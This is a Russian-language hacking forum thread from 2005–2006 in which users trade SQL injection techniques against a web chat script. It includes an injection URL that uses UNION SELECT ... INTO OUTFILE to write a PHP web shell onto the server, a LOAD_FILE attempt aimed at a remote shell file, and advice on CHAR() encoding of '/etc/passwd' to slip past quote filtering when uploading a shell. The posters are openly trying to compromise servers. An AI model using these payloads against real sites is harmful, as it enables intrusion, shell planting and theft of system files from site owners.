 |
|
07.11.2005, 17:21
|
|
Участник форума
Регистрация: 16.09.2004
Сообщений: 193
С нами:
11393666
Репутация:
47
|
|
insidex, LOAD_FILE('http://www.hiliv.narod.ru/shell.txt') так нельзя, можно читать только локальные файлы. Также у тебя должны быть права на чтение этого файла и он не должен превышать определенного размера, установленного на сервере.
|
|
|
07.11.2005, 22:18
|
|
Познающий
Регистрация: 13.10.2005
Сообщений: 41
С нами:
10828756
Репутация:
1
|
|
Спасибо за информацию! Ну тогла скажите,возможно ли записать через эту уязвимость в файл на сервере то,что у k1b0rg в подписи  |
|
|
|
07.11.2005, 22:40
|
|
Участник форума
Регистрация: 16.09.2004
Сообщений: 193
С нами:
11393666
Репутация:
47
|
|
А так как я тебе предлагал, не работает?
http://mysite.com/chat/usersL.php3?L=russian&R='+UNION+SELECT+'<?php',nul l,null,null+FROM+register_user+into+outfi le+'../shell.php'/*
|
|
|
|
07.11.2005, 22:52
|
|
Познающий
Регистрация: 13.10.2005
Сообщений: 41
С нами:
10828756
Репутация:
1
|
|
К сожалению нет,пишет зараза:
MySQL error: 1267 (Illegal mix of collations (utf8_general_ci,IMPLICIT) and (cp1251_general_ci,COERCIBLE) for operation 'UNION')
|
|
|
|
11.10.2006, 20:13
|
|
Новичок
Регистрация: 09.05.2006
Сообщений: 13
С нами:
10530310
Репутация:
3
|
|
Подскажите Ньюбу
Есть инъекция. Хочу сформировать запрос на заливку шела.
Кавычки не прокатывают. Хочу использовать функцию Char.
Внимание вопрос. Есть ли какой то простой вариант приобразовывать строку в Char символы?
Т.е. В виде примера ('/etc/passwd') в строку типа ,(char(47,101,116,99,47,112,97,115,115,119,100))
соответственно хочется конвертить свою строку.
Заранее спасиба.
|
|
|
|
12.10.2006, 01:57
|
|
[Лишённый самовыражени
Регистрация: 16.01.2005
Сообщений: 1,787
С нами:
11217866
Репутация:
3812
|
|
http://quest.antichat.net/code.php
мм....?
__________________
|
|
|
|
13.10.2006, 00:58
|
|
Новичок
Регистрация: 09.05.2006
Сообщений: 13
С нами:
10530310
Репутация:
3
|
|
Tnx
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
